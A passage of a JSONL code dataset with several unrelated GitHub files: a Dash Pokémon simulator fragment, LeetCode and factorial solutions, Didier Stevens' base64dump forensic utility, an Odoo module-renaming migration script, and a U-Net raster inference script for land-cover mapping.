'borderRadius': '3px'}, curr_log\n\n\n@app.callback(\n [Output('win-text', 'children'),\n Output('win-text', 'style'),\n Output('win-text-box', 'style')],\n [Input('won', 'data'),\n Input('winner', 'data')]\n)\ndef show_win(won, winner):\n \"\"\" display winner and style win statement \"\"\"\n if won:\n return winner + ' Wins!', {'color': '#414141', 'opacity': '1', 'fontSize': '50px', 'margin': '15vh 22vw',\n 'textAlign': 'center'}, \\\n {'backgroundColor': 'white', 'opacity': '0.4', 'height': '50vh', 'width': '55vw', 'position': 'absolute'}\n\n return '', {}, {}\n\n\n@app.callback(\n Output('hidden-div', 'children'),\n Input('new-game-button', 'n_clicks'),\n [State('player-pokemon', 'data'),\n State('opponent-pokemon', 'data'),\n State('start-stats', 'data')],\n prevent_initial_call=True\n)\ndef reset_pokes(new, player, opp, stats):\n \"\"\"\n Resets the pokemon stats of each pokemon\n Args:\n new: triggers function on new game opened\n player: name of player pokemon\n opp: name of opponent pokemon\n stats: original stats to reset to\n\n Returns: nothing. resets pokemon objects\n\n \"\"\"\n if stats:\n pokemons[player].wipe(stats['player'])\n pokemons[opp].wipe(stats['opponent'])\n return ''\n\n\n# Run the app on localhost:8050\nif __name__ == '__main__':\n app.run_server(debug=True)","repo_name":"kaldenh/pokemon_simulator","sub_path":"index.py","file_name":"index.py","file_ext":"py","file_size_in_byte":16255,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"10077003928","text":"# encoding=utf8\n\n\n'''\n392. 判断子序列\n给定字符串 s 和 t ,判断 s 是否为 t 的子序列。\n\n你可以认为 s 和 t 中仅包含英文小写字母。字符串 t 可能会很长(长度 ~= 500,000),而 s 是个短字符串(长度 <=100)。\n\n字符串的一个子序列是原始字符串删除一些(也可以不删除)字符而不改变剩余字符相对位置形成的新字符串。(例如,\"ace\"是\"abcde\"的一个子序列,而\"aec\"不是)。\n\n示例 1:\ns = \"abc\", t = \"ahbgdc\"\n\n返回 true.\n\n示例 2:\ns = \"axc\", t = \"ahbgdc\"\n\n返回 false.\n\n后续挑战 :\n\n如果有大量输入的 S,称作S1, S2, ... , Sk 其中 k >= 10亿,你需要依次检查它们是否为 T 的子序列。在这种情况下,你会怎样改变代码?\n\n\n392. Is Subsequence\nGiven a string s and a string t, check if s is subsequence of t.\n\nA subsequence of a string is a new string which is formed from the original string by deleting some (can be none) of the characters without disturbing the relative positions of the remaining characters. (ie, \"ace\" is a subsequence of \"abcde\" while \"aec\" is not).\n\nFollow up:\nIf there are lots of incoming S, say S1, S2, ... , Sk where k >= 1B, and you want to check one by one to see if T has its subsequence. In this scenario, how would you change your code?\n\nCredits:\nSpecial thanks to @pbrother for adding this problem and creating all test cases.\n\n\n\nExample 1:\n\nInput: s = \"abc\", t = \"ahbgdc\"\nOutput: true\nExample 2:\n\nInput: s = \"axc\", t = \"ahbgdc\"\nOutput: false\n\n\nConstraints:\n\n0 <= s.length <= 100\n0 <= t.length <= 10^4\nBoth strings consists only of lowercase characters.\n'''\n\n\nclass Solution(object):\n def isSubsequence(self, s, t):\n \"\"\"\n :type s: str\n :type t: str\n :rtype: bool\n \"\"\"\n if not s:\n return True\n i, j = 0, 0\n while i < len(s) and j < len(t):\n if t[j] == s[i]:\n i += 1\n j += 1\n if i == len(s):\n return True\n return i == len(s)\n\n\n# golang solutions\n\n'''\nfunc isSubsequence(s string, t string) bool {\n\n i, j := 0, 0\n for i < len(s) && j < len(t){\n if s[i] == t[j]{\n i++\n }\n j++\n }\n if i == len(s){\n return true\n }\n return false\n\n}\n'''\n","repo_name":"MecaCho/algorithms_training","sub_path":"algorithms/binary_search/leetcode-392-IsSubsequence.py","file_name":"leetcode-392-IsSubsequence.py","file_ext":"py","file_size_in_byte":2310,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"32429370628","text":"#!/usr/bin/env python\n\n__description__ = 'Extract base64 strings from file'\n__author__ = 'Didier Stevens'\n__version__ = '0.0.1'\n__date__ = '2015/07/01'\n\n\"\"\"\n\nSource code put in public domain by Didier Stevens, no Copyright\nhttps://DidierStevens.com\nUse at your own risk\n\nHistory:\n 2015/06/30: start\n 2015/07/01: added header\n\nTodo:\n\"\"\"\n\nimport optparse\nimport sys\nimport os\nimport zipfile\nimport cStringIO\nimport binascii\nimport textwrap\nimport re\nimport hashlib\n\ndumplinelength = 16\nMALWARE_PASSWORD = 'infected'\n\ndef PrintManual():\n manual = '''\nManual:\n\n'''\n for line in manual.split('\\n'):\n print(textwrap.fill(line))\n\n#Convert 2 Bytes If Python 3\ndef C2BIP3(string):\n if sys.version_info[0] > 2:\n return bytes([ord(x) for x in string])\n else:\n return string\n\n# CIC: Call If Callable\ndef CIC(expression):\n if callable(expression):\n return expression()\n else:\n return expression\n\n# IFF: IF Function\ndef IFF(expression, valueTrue, valueFalse):\n if expression:\n return CIC(valueTrue)\n else:\n return CIC(valueFalse)\n\ndef File2String(filename):\n try:\n f = open(filename, 'rb')\n except:\n return None\n try:\n return f.read()\n except:\n return None\n finally:\n f.close()\n\nclass cDumpStream():\n def __init__(self):\n self.text = ''\n\n def Addline(self, line):\n if line != '':\n self.text += line + '\\n'\n\n def Content(self):\n return self.text\n\ndef HexDump(data):\n oDumpStream = cDumpStream()\n hexDump = ''\n for i, b in enumerate(data):\n if i % dumplinelength == 0 and hexDump != '':\n oDumpStream.Addline(hexDump)\n hexDump = ''\n hexDump += IFF(hexDump == '', '', ' ') + '%02X' % ord(b)\n oDumpStream.Addline(hexDump)\n return oDumpStream.Content()\n\ndef CombineHexAscii(hexDump, asciiDump):\n if hexDump == '':\n return ''\n return hexDump + ' ' + (' ' * (3 * (dumplinelength - len(asciiDump)))) + asciiDump\n\ndef HexAsciiDump(data):\n oDumpStream = cDumpStream()\n hexDump = ''\n asciiDump = ''\n for i, b in enumerate(data):\n if i % dumplinelength == 0:\n if hexDump != '':\n oDumpStream.Addline(CombineHexAscii(hexDump, asciiDump))\n hexDump = '%08X:' % i\n asciiDump = ''\n hexDump+= ' %02X' % ord(b)\n asciiDump += IFF(ord(b) >= 32, b, '.')\n oDumpStream.Addline(CombineHexAscii(hexDump, asciiDump))\n return oDumpStream.Content()\n\n#Fix for http://bugs.python.org/issue11395\ndef StdoutWriteChunked(data):\n while data != '':\n sys.stdout.write(data[0:10000])\n try:\n sys.stdout.flush()\n except IOError:\n return\n data = data[10000:]\n\ndef IfWIN32SetBinary(io):\n if sys.platform == 'win32':\n import msvcrt\n msvcrt.setmode(io.fileno(), os.O_BINARY)\n\ndef File2Strings(filename):\n try:\n f = open(filename, 'r')\n except:\n return None\n try:\n return map(lambda line:line.rstrip('\\n'), f.readlines())\n except:\n return None\n finally:\n f.close()\n\ndef ProcessAt(argument):\n if argument.startswith('@'):\n strings = File2Strings(argument[1:])\n if strings == None:\n raise Exception('Error reading %s' % argument)\n else:\n return strings\n else:\n return [argument]\n\ndef ExpandFilenameArguments(filenames):\n return list(collections.OrderedDict.fromkeys(sum(map(glob.glob, sum(map(ProcessAt, filenames), [])), [])))\n\ndef AsciiDump(data):\n return ''.join([IFF(ord(b) >= 32, b, '.') for b in data])\n\ndef BASE64Dump(filename, options):\n if filename == '':\n IfWIN32SetBinary(sys.stdin)\n oStringIO = cStringIO.StringIO(sys.stdin.read())\n elif filename.lower().endswith('.zip'):\n oZipfile = zipfile.ZipFile(filename, 'r')\n oZipContent = oZipfile.open(oZipfile.infolist()[0], 'r', C2BIP3(MALWARE_PASSWORD))\n oStringIO = cStringIO.StringIO(oZipContent.read())\n oZipContent.close()\n oZipfile.close()\n else:\n oStringIO = cStringIO.StringIO(open(filename, 'rb').read())\n\n if options.dump:\n DumpFunction = lambda x:x\n IfWIN32SetBinary(sys.stdout)\n elif options.hexdump:\n DumpFunction = HexDump\n else:\n DumpFunction = HexAsciiDump\n\n if options.select == '':\n formatString = '%-2s %-7s %-16s %-16s %-32s'\n columnNames = ('ID', 'Size', 'BASE64', 'Decoded', 'MD5 decoded')\n print(formatString % columnNames)\n print(formatString % tuple(['-' * len(s) for s in columnNames]))\n\n counter = 1\n data = oStringIO.read()\n for base64string in re.findall('[ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/]+={0,2}', data):\n if len(base64string) % 4 == 0:\n try:\n base64data = binascii.a2b_base64(base64string)\n except:\n break\n if options.select == '':\n print('%2d: %7d %-16s %-16s %s' % (counter, len(base64string), base64string[0:16], AsciiDump(base64data[0:16]), hashlib.md5(base64data).hexdigest()))\n elif ('%s' % counter) == options.select:\n StdoutWriteChunked(DumpFunction(base64data))\n counter += 1\n\n return 0\n\ndef Main():\n oParser = optparse.OptionParser(usage='usage: %prog [options] [file]\\n' + __description__, version='%prog ' + __version__)\n oParser.add_option('-m', '--man', action='store_true', default=False, help='Print manual')\n oParser.add_option('-s', '--select', default='', help='select item nr for dumping (a for all)')\n oParser.add_option('-d', '--dump', action='store_true', default=False, help='perform dump')\n oParser.add_option('-x', '--hexdump', action='store_true', default=False, help='perform hex dump')\n oParser.add_option('-a', '--asciidump', action='store_true', default=False, help='perform ascii dump')\n (options, args) = oParser.parse_args()\n\n if options.man:\n oParser.print_help()\n PrintManual()\n return 0\n\n if len(args) > 1:\n oParser.print_help()\n print('')\n print(' Source code put in the public domain by Didier Stevens, no Copyright')\n print(' Use at your own risk')\n print(' https://DidierStevens.com')\n return 0\n elif len(args) == 0:\n return BASE64Dump('', options)\n else:\n return BASE64Dump(args[0], options)\n\nif __name__ == '__main__':\n sys.exit(Main())\n","repo_name":"ryanmrestivo/red-team","sub_path":"Forensic-Reverse-Engineering-Password-Attacks-&-Analysis/_Password_Attacks_Decode_&_Hashes/base64dump.py","file_name":"base64dump.py","file_ext":"py","file_size_in_byte":6522,"program_lang":"python","lang":"en","doc_type":"code","stars":91,"dataset":"github-code","pt":"21"} +{"seq_id":"9709977811","text":"def factorial(n):\r\n if n == 0:\r\n return 1\r\n else:\r\n return n * factorial(n - 1)\r\n\r\n\r\nN = int(input())\r\n\r\nif N == 0:\r\n print(\"NO\")\r\n exit(0)\r\nelse:\r\n for i in range(20, -1, -1):\r\n if N >= factorial(i):\r\n N -= factorial(i)\r\nif N == 0:\r\n print(\"YES\")\r\nelse:\r\n print(\"NO\")","repo_name":"skh990427/Baekjoon","sub_path":"백준/Silver/2057. 팩토리얼 분해/팩토리얼 분해.py","file_name":"팩토리얼 분해.py","file_ext":"py","file_size_in_byte":321,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"33134419631","text":"import logging\nimport os\nimport pathlib\nimport subprocess\n\n_logger = logging.getLogger(__name__)\n\n\ndef all_databases():\n result = subprocess.run([\"ociedoo\", \"list-db\"], check=True, stdout=subprocess.PIPE)\n output = result.stdout.decode(\"utf-8\")\n return [line for line in output.splitlines() if line]\n\n\ndef filter_databases(databases):\n return [database for database in databases if database.endswith(\"-test\")]\n\n\ndef main():\n os.chdir(pathlib.Path(__file__).parent)\n logging.basicConfig(level=logging.INFO)\n # don't filter databases\n # databases = filter_databases(all_databases())\n databases = filter_databases(all_databases())\n for database in databases:\n # don't create new DB\n new_database = database\n # _logger.info(f\"Removing {new_database} if it exists\")\n # subprocess.run([\"ociedoo\", \"drop-db\", new_database])\n # _logger.info(f\"Creating {new_database} from {database}\")\n # subprocess.run([\"ociedoo\", \"copy-db\", database, new_database], check=True)\n _logger.info(f\"Running renaming migration on {new_database}\")\n subprocess.run([\"./rename_deprecated_modules.sh\", new_database], check=True)\n _logger.info(f\"Done with renaming migration of {new_database}\")\n\n\nif __name__ == \"__main__\":\n main()\n","repo_name":"coopiteasy/vertical-cooperative","sub_path":"rename_all_deprecated_modules.py","file_name":"rename_all_deprecated_modules.py","file_ext":"py","file_size_in_byte":1294,"program_lang":"python","lang":"en","doc_type":"code","stars":37,"dataset":"github-code","pt":"21"} +{"seq_id":"33687583240","text":"from argparse import ArgumentParser\n\nimport logging\nimport time\nfrom sklearn import multiclass\nimport torch\nimport torchmetrics\nfrom torchmetrics import ConfusionMatrix\nfrom pytorch_lightning import LightningModule, Trainer, seed_everything\nfrom torch.nn import functional as F\nimport numpy as np\nfrom pytorch_lightning.loggers import TensorBoardLogger\nfrom sklearn.metrics import ConfusionMatrixDisplay, confusion_matrix\nimport rasterio\nfrom rasterio import windows\nfrom rasterio.windows import Window\nfrom rasterio.transform import Affine\nfrom rasterio.crs import CRS\n\nfrom tqdm import tqdm\nfrom skimage.exposure import match_histograms\n\nfrom itertools import product\nimport matplotlib.pyplot as plt\n\n#from pl_bolts.models.vision.unet import UNet\nfrom unet_3enco_sum import unet_3enco_sum\nfrom pytorch_lightning.callbacks import Callback, ModelCheckpoint, LearningRateMonitor\n\n\n# Custom LR\nfrom utils import get_datasets_inference, get_datasets\nfrom dataset import inference_on_full_image_dataset\n\n# Custom loss\nfrom custom_loss import FocalLoss\n\n# Add to specified some tensor to GPU\ndevice = torch.device(\"cuda:0\") if torch.cuda.is_available() else torch.device(\"cpu\")\n\nclass SemSegment(LightningModule):\n def __init__(\n self,\n #lr: float = 0.001,\n #num_classes: int = 19,\n num_classes: int = 8,\n #num_layers: int = 5,\n features_start: int = 64,\n bilinear: bool = True,\n\n ):\n \"\"\"\n Adapted from the implementation of `Annika Brundyn ` in PyTorch lightning\n\n Args:\n num_layers: number of layers in each side of U-net (default 5)\n features_start: number of features in first layer (default 64)\n bilinear: whether to use bilinear interpolation (True) or transposed convolutions (default) for upsampling.\n lr: learning (default 0.01)\n \"\"\"\n super().__init__()\n \n self.num_classes = num_classes\n self.num_layers = num_layers_main\n self.features_start = features_start\n self.bilinear = bilinear\n self.lr = lr_main\n self.new_time = time.time()\n self.train_time_list = []\n\n # Metrics \n # self.train_accuracy = torchmetrics.Accuracy(mdmc_average='samplewise')\n # self.val_accuracy = torchmetrics.Accuracy(mdmc_average='samplewise')\n # self.train_f1 = torchmetrics.F1Score(mdmc_average='samplewise')\n # self.val_f1 = torchmetrics.F1Score(mdmc_average='samplewise')\n\n # Model\n self.net = unet_3enco_sum(\n num_classes=num_classes,\n input_channels=input_channel_main,\n input_channels_lidar=input_channel_lidar,\n input_channels_radar=input_channel_radar,\n num_layers=self.num_layers,\n features_start=self.features_start,\n bilinear=self.bilinear,\n )\n\n # def forward(self, x):\n # return self.net(x)\n\n def forward(self, x, y, z):\n return self.net(x, y, z)\n\n @torch.no_grad()\n def test_step(self, batch, batch_idx):\n self.trainer.model.eval()\n\n #img, lidar, mask, radar, img_path = batch \n #img, lidar, radar, img_path = batch \n\n\n\n # # stack both sentinel 2 images\n # img_opt = np.dstack((sen2_ete_img, sen2_print_img))\n\n # #img_lidar = np.dstack((img_mnt, img_mhc, img_slopes, img_tpi, img_tri, img_twi))\n # img_lidar = np.dstack((img_mhc, img_slopes, img_tpi, img_tri, img_twi))\n\n # # if img_lidar.dtype != 'float32':\n # # img_lidar = np.float32(img_lidar) # Only for overlapping dataset #TODO\n # # else:\n # # pass\n\n\n # img_rad = np.dstack((sen1_ete_img, sen1_print_img)) # stack both sen-1 images\n\n # # Cast to tensor for better permute\n # img_opt = torch.from_numpy(img_opt)\n # img_opt = img_opt.permute(2,0,1)\n\n # # Apply standardization (see : discuss.pytorch.org/t/how-to-normalize-multidimensional-tensor/65304)\n # #img_opt = img_opt.sub_(combined_mean[:, None, None]).div_(combined_std[:, None, None])\n\n # k_lidar_means = torch.tensor([13.348262, 13.45669, -0.006740755, -3.689763, 5.7766604])\n # k_lidar_stds = torch.tensor([7.7406297, 13.942361, 1.3129127, 241.4134, 5.6496654])\n\n # img_lidar = torch.from_numpy(img_lidar)\n # img_lidar = img_lidar.permute(2,0,1)\n\n # # Standardization\n # img_lidar = img_lidar.sub_(k_lidar_means[:, None, None]).div_(k_lidar_stds[:, None, None])\n\n # img_rad = torch.from_numpy(img_rad)\n # img_rad = img_rad.permute(2,0,1)\n\n # img = img_opt.float() # x\n # lidar = img_lidar.float()\n # #mask = mask.long() # y \n # radar = img_rad.float() # z\n\n img = bands[0:23]\n radar = bands[24:29]\n lidar = bands[30:34]\n\n preds = self(img, lidar, radar) # predictions\n\n # preds_temp = preds.argmax(dim=1).unsqueeze(1)\n # preds_recast = preds_temp.type(torch.IntTensor).to(device=device) \n\n # confmat = ConfusionMatrix(num_classes=8).to(device=device)\n # conf_print = confmat(preds_recast, mask)\n \n #return {'conf matrice': conf_print, 'preds' : preds, 'img' : img, 'lidar' : lidar, 'mask' : mask, 'radar' : radar, 'img_path' : img_path}\n #return {'preds' : preds, 'img' : img, 'lidar' : lidar, 'radar' : radar, 'img_path' : img_path}\n \n # @torch.no_grad()\n # def test_epoch_end(self, outputs):\n # # TODO Add logs to test aswell?\n\n # for x in range(len(outputs)):\n # fig = plt.figure()\n # cm = outputs[x]['conf matrice'].cpu().numpy()\n # disp = ConfusionMatrixDisplay(confusion_matrix=cm)\n # disp.plot()\n # plt.savefig(\"lightning_logs/inference_{version}/cm_{num}.png\".format(version = log_version, num = x))\n # plt.close(fig)\n\n # # Extract CRS and transforms\n # img_path = outputs[x]['img_path']\n # src = rasterio.open(img_path[0])\n # sample_crs = src.crs\n # transform_ori = src.transform\n # src.close() # Needed?\n\n # ori_input = outputs[x]['img'][0].cpu().numpy()\n # ori_target = outputs[x]['mask'][0].cpu().numpy()\n # predict_sig = outputs[x]['preds'][0].cpu().argmax(dim=0).numpy().astype(np.int32)\n\n # # write predict image to file\n # tiff_save_path = \"lightning_logs/inference_{version}/predict_geo_{num}.tif\".format(version = log_version, num = x)\n # #tiff_save_path = \"lightning_logs/version_{version}/predict_geo_{num}.tif\".format(version = log_version, num = x)\n\n # predict_img = rasterio.open(tiff_save_path, 'w', driver='GTiff',\n # height = input_tile_size, width = input_tile_size,\n # count=1, dtype=str(predict_sig.dtype),\n # crs=sample_crs,\n # transform=transform_ori)\n\n # predict_img.write(predict_sig, 1)\n # predict_img.close()\n\n # fig = plt.figure()\n # plt.subplot(1,3,1)\n # plt.imshow(np.transpose(ori_input[[3,2,1],:,:],(1,2,0))*3)\n # plt.title(\"Input\")\n # plt.subplot(1,3,2)\n # plt.imshow(predict_sig)\n # plt.title(\"Predict\")\n # plt.subplot(1,3,3)\n # plt.imshow(ori_target)\n # plt.title(\"Target\")\n\n # plt.savefig(\"lightning_logs/inference_{version}/fig_{num}.png\".format(version = log_version, num = x))\n # plt.close(fig)\n\n # self.trainer.model.train()\n\n # @staticmethod\n # def add_model_specific_args(parent_parser):\n # parser = ArgumentParser(parents=[parent_parser], add_help=False)\n # parser.add_argument(\"--lr\", type=float, default=0.01, help=\"adam: learning rate\")\n # parser.add_argument(\"--num_layers\", type=int, default=5, help=\"number of layers on u-net\")\n # parser.add_argument(\"--features_start\", type=float, default=64, help=\"number of features in first layer\")\n # parser.add_argument(\n # \"--bilinear\", action=\"store_true\", default=False, help=\"whether to use bilinear interpolation or transposed\"\n # )\n\n # return parser\n\n# Utils fonction outside of main class\n# Windowed iteration inspired by : https://gis.stackexchange.com/questions/396891/parsing-through-a-sentinel-2-tile\n## TODO Move create stack to utilities \ndef create_stacked_image():\n file_list = [path_to_full_sen2_ete, path_to_full_sen2_print, path_to_full_sen1_ete, path_to_full_sen1_print, path_to_full_mhc, path_to_full_slopes, path_to_full_tpi, path_to_full_tri, path_to_full_twi]\n nb_of_layers = 35\n\n # Read metadata of first file\n with rasterio.open(file_list[0]) as src0:\n meta = src0.meta\n\n # Update meta to reflect the number of layers\n #meta.update(count = len(file_list))\n meta.update(count = nb_of_layers)\n\n # Read each layer and write it to stack\n # with rasterio.open('stack.tif', 'w', **meta) as dst:\n # for id, layer in enumerate(file_list, start=1):\n # print(id, layer)\n # with rasterio.open(layer) as src1:\n # dst.write_band(id, src1.read(1))\n\n with rasterio.open('/mnt/SN750/stack_with_STD_HM_v2.tif', 'w', **meta) as dst:\n id = 1\n for images in file_list:\n print(\"Writing image from : \", images)\n with rasterio.open(images) as src_tmp:\n array = src_tmp.read(out_dtype='float32')\n for bands in array:\n print(\"Writing bands no : \", id)\n dst.write_band(id, bands)\n id += 1\n\ndef iter_windows(src_ds, width, height, boundless=False):\n offsets = product(range(0, src_ds.meta['width'], width), range(0, src_ds.meta['height'], height))\n big_window = windows.Window(col_off=0, row_off=0, width=src_ds.meta['width'], height=src_ds.meta['height'])\n for col_off, row_off in offsets:\n\n window = windows.Window(col_off=col_off, row_off=row_off, width=width, height=height)\n\n if boundless:\n yield window\n else:\n yield window.intersection(big_window)\n\n# def iter_windows_no_meta(src_ds, width, height, boundless=False):\n\n# offsets = product(range(0, src_ds.shape[1], width), range(0, src_ds.shape[2], height))\n# big_window = windows.Window(col_off=0, row_off=0, width=src_ds.shape[1], height=src_ds.shape[2])\n# for col_off, row_off in offsets:\n\n# window = windows.Window(col_off=col_off, row_off=row_off, width=width, height=height)\n\n# if boundless:\n# yield window\n# else:\n# yield window.intersection(big_window)\n\n# From : https://pyimagesearch.com/2015/03/23/sliding-windows-for-object-detection-with-python-and-opencv/\n# Input image shape should be C x H x W\n\ndef iter_windows_no_meta(src_ds, stepsize, height, width):\n for y in range(0, src_ds.shape[1], stepsize):\n for x in range(0, src_ds.shape[2], stepsize):\n yield (x, y, src_ds[:, y:y + height, x:x + width])\n\ndef inference_from_ckpt(ckpt_path, bands):\n model = SemSegment.load_from_checkpoint(\n checkpoint_path=ckpt_path,\n )\n\n #trainer = Trainer(accelerator='gpu', devices=1)\n #trainer.test(model)\n #trainer.predict(model, dataloaders=None)\n #img_sen2_print = \n\n\n # Input need shape (B X C X H X W) where B is the batchsize, that is why we unsqueeze to have B = 1\n img = torch.from_numpy(bands[0:24]).unsqueeze(0)\n radar = torch.from_numpy(bands[24:30]).unsqueeze(0)\n\n lidar = torch.from_numpy(bands[30:35])\n\n # Temporary std and means for lidar\n k_lidar_means = torch.tensor([13.348262, 13.45669, -0.006740755, -3.689763, 5.7766604])\n k_lidar_stds = torch.tensor([7.7406297, 13.942361, 1.3129127, 241.4134, 5.6496654])\n\n estrie_lidar_mean = torch.tensor([7.798849, 5.5523205, 0.0029951811, 0.06429929, 6.7409873])\n estrie_lidar_std = torch.tensor([7.033332, 5.196636, 1.0641352, 0.06102526, 3.182435])\n\n lidar = lidar.sub_(k_lidar_means[:, None, None]).div_(k_lidar_stds[:, None, None])\n #lidar = lidar.sub_(estrie_lidar_mean[:, None, None]).div_(estrie_lidar_std[:, None, None])\n\n lidar = lidar.unsqueeze(0)\n\n model.eval()\n pred = model(img, lidar, radar)\n\n #pred_temp = pred.argmax(dim=1).unsqueeze(1)\n #pred_recast = pred_temp.type(torch.IntTensor).to(device=device) \n\n predict_sig = pred[0].detach().argmax(dim=0) #.numpy().astype(np.int16)\n #predict_sig = pred.detach().argmax(dim=1) #.numpy() #.astype(np.int16)\n\n return predict_sig\n\n# #TODO move to utils when clean\n# def histo_matching(target_arr, ref_arr):\n\n\n# ar_k = match_histograms(target_arr, ref_arr channel_axis=0)\n\n\nif __name__ == \"__main__\":\n # Activate logging\n logging.basicConfig()\n\n # Optional timer activation\n #start_time_glob = time.time()\n\n # Model parameters\n num_layers_main = 4\n lr_main = 0.001\n input_channel_main = 24\n input_channel_lidar = 5\n input_channel_radar = 6\n\n ## TODO Move create stack to utilities \n # Paths to original data (no standardization or histogram matching)\n # path_to_full_sen2_ete = '/mnt/Data/00_Donnees/02_maitrise/01_trainings/kenauk/processed_raw/sen2/ete/s2_kenauk_3m_ete_aout2020.tif'\n # path_to_full_sen2_print = '/mnt/Data/00_Donnees/02_maitrise/01_trainings/kenauk/processed_raw/sen2/print/S2_de_kenauk_3m_printemps_mai2020.tif' \n # path_to_full_sen1_ete = '/mnt/Data/00_Donnees/02_maitrise/01_trainings/kenauk/processed_raw/sen1/ete/s1_kenauk_3m_ete_aout2020.tif' \n # path_to_full_sen1_print = '/mnt/Data/00_Donnees/02_maitrise/01_trainings/kenauk/processed_raw/sen1/print/S1_kenauk_3m_printemps_mai2020.tif' \n # path_to_full_mhc = '/mnt/Data/00_Donnees/02_maitrise/01_trainings/kenauk/processed_raw/lidar/mhc_kenauk_3m.tif' \n # path_to_full_slopes = '/mnt/Data/00_Donnees/02_maitrise/01_trainings/kenauk/processed_raw/lidar/pentes_kenauk_3m.tif' \n # path_to_full_tpi = '/mnt/Data/00_Donnees/02_maitrise/01_trainings/kenauk/processed_raw/lidar/tpi_kenauk_3m.tif' \n # path_to_full_tri = '/mnt/Data/00_Donnees/02_maitrise/01_trainings/kenauk/processed_raw/lidar/tri_kenauk_3m.tif' \n # path_to_full_twi = '/mnt/Data/00_Donnees/02_maitrise/01_trainings/kenauk/processed_raw/lidar/twi_kenauk_3m.tif' \n\n # Paths to standardize and/or histogram matched dataa\n path_to_full_sen2_ete = '/mnt/Data/00_Donnees/02_maitrise/01_trainings/kenauk/raw_standard/s2_kenauk_3m_ete_HMe_STD.tif' \n path_to_full_sen2_print = '/mnt/Data/00_Donnees/02_maitrise/01_trainings/kenauk/raw_standard/s2_kenauk_3m_print_HMe_STD.tif' \n path_to_full_sen1_ete = '/mnt/Data/00_Donnees/02_maitrise/01_trainings/kenauk/raw_standard/s1_kenauk_3m_ete_STD.tif' \n path_to_full_sen1_print = '/mnt/Data/00_Donnees/02_maitrise/01_trainings/kenauk/raw_standard/s1_kenauk_3m_print_STD.tif' \n path_to_full_mhc = '/mnt/Data/00_Donnees/02_maitrise/01_trainings/kenauk/processed_raw/lidar/mhc_kenauk_3m.tif' \n path_to_full_slopes = '/mnt/Data/00_Donnees/02_maitrise/01_trainings/kenauk/processed_raw/lidar/pentes_kenauk_3m.tif' \n path_to_full_tpi = '/mnt/Data/00_Donnees/02_maitrise/01_trainings/kenauk/processed_raw/lidar/tpi_kenauk_3m.tif' \n path_to_full_tri = '/mnt/Data/00_Donnees/02_maitrise/01_trainings/kenauk/processed_raw/lidar/tri_kenauk_3m.tif' \n path_to_full_twi = '/mnt/Data/00_Donnees/02_maitrise/01_trainings/kenauk/processed_raw/lidar/twi_kenauk_3m.tif' \n\n #create_stacked_image()\n\n # with rasterio.open(path_to_full_tri) as dst:\n # array = dst.read(out_dtype='float32')\n # for bands in array:\n # print(bands)\n\n # # id = 1\n # # for images in file_list:\n # # print(\"Writing image from : \", images)\n # # with rasterio.open(images) as src_tmp:\n # # array = src_tmp.read(out_dtype='float32')\n # # for bands in array:\n # # print(\"Writing bands no : \", id)\n # # dst.write_band(id, bands)\n # # id += 1\n\n size = 256\n path_to_stack_img = '/mnt/SN750/stack_with_STD_HM_v2.tif'\n\n # #TODO automatiser les paths\n # # Evaluate \n ckpt_path = \"/mnt/Data/01_Codes/00_Github/Unet_lightning/lightning_logs/version_182/checkpoints/epoch=48-step=41797.ckpt\"\n #ckpt_path = \"/mnt/Data/01_Codes/00_Github/Unet_lightning/lightning_logs/version_182/checkpoints/epoch=46-step=40091.ckpt\"\n log_version = \"182_kenauk_2020_4\"\n\n #With premade stack \n logging.info('Starting prediction on full image')\n with rasterio.open(path_to_stack_img) as ds:\n profile = ds.profile\n profile['count'] = 1 # assume output is a single band raster\n with rasterio.open(path_to_stack_img.replace(\".tif\", \"_clc_nometa_std_hm_sen2_tpi_correct_v4_estrie.tif\"), \"w\", **profile) as out_ds:\n #for window in tqdm(iter_windows(ds, size, size), total=len(list(iter_windows(ds, size, size))), desc='Predicting and creating output'):\n for window in tqdm(iter_windows(ds, size, size), total=len(list(iter_windows(ds, size, size))), desc='Predicting and creating output'):\n bands = ds.read(window=window, out_dtype='float32')\n tile = inference_from_ckpt(ckpt_path, bands)\n out_ds.write(tile, 1, window=window)\n logging.info('Prediction finished')\n\n\n ## With loading data directly\n # profile_temp = {'driver': 'GTiff', \n # 'dtype': 'uint16', \n # 'nodata': None, \n # 'width': 7836, \n # 'height': 6101, \n # 'count': 1, \n # 'crs': CRS.from_epsg(32198), \n # 'transform': Affine(3.0, 0.0, -544994.0388, 0.0, -3.0, 234380.8231), \n # 'tiled': False, 'interleave': 'pixel'}\n\n\n # logging.info('Starting prediction on full image')\n\n # with rasterio.open(path_to_stack_img) as ds:\n # # sentinel 2 images\n # sen2_ete_img = ds.read((1,2,3,4,5,6,7,8,9,10,11,12), out_dtype='float32')\n # sen2_print_img = ds.read((13,14,15,16,17,18,19,20,21,22,23,24), out_dtype='float32')\n\n # # sentinel-1 images\n # sen1_ete_img = ds.read((25,26,27), out_dtype='float32')\n # sen1_print_img = ds.read((28,29,30), out_dtype='float32')\n\n # # lidar images\n # img_mhc = np.expand_dims(ds.read((31), out_dtype='float32'), 0)\n # img_slopes = np.expand_dims(ds.read((32), out_dtype='float32'), 0)\n # img_tpi = np.expand_dims(ds.read((33), out_dtype='float32'), 0)\n # img_tri = np.expand_dims(ds.read((34), out_dtype='float32'), 0)\n # img_twi = np.expand_dims(ds.read((35), out_dtype='float32'), 0)\n\n # full_array = np.concatenate((sen2_ete_img, sen2_print_img, sen1_ete_img, sen1_print_img, img_mhc, img_slopes, img_tpi, img_tri, img_twi))\n\n # profile = profile_temp\n # #profile['count'] = 1 # assume output is a single band raster\n\n # with rasterio.open(path_to_stack_img.replace(\".tif\", \"_clc_nometa_std_hm_sen2_lidar.tif\"), \"w\", **profile) as out_ds:\n # #for window in tqdm(iter_windows(ds, size, size), total=len(list(iter_windows(ds, size, size))), desc='Predicting and creating output'):\n # for window in tqdm(iter_windows_no_meta(full_array, size, size, size), total=len(list(iter_windows_no_meta(full_array, size, size, size))), desc='Predicting and creating output'):\n # #bands = ds.read(window=window, out_dtype='float32')\n # tile = inference_from_ckpt(ckpt_path, window[2])\n # out_ds.write(tile, 1, window=Window(window[0], window[1], window[2].shape[2], window[2].shape[1]))\n\n # 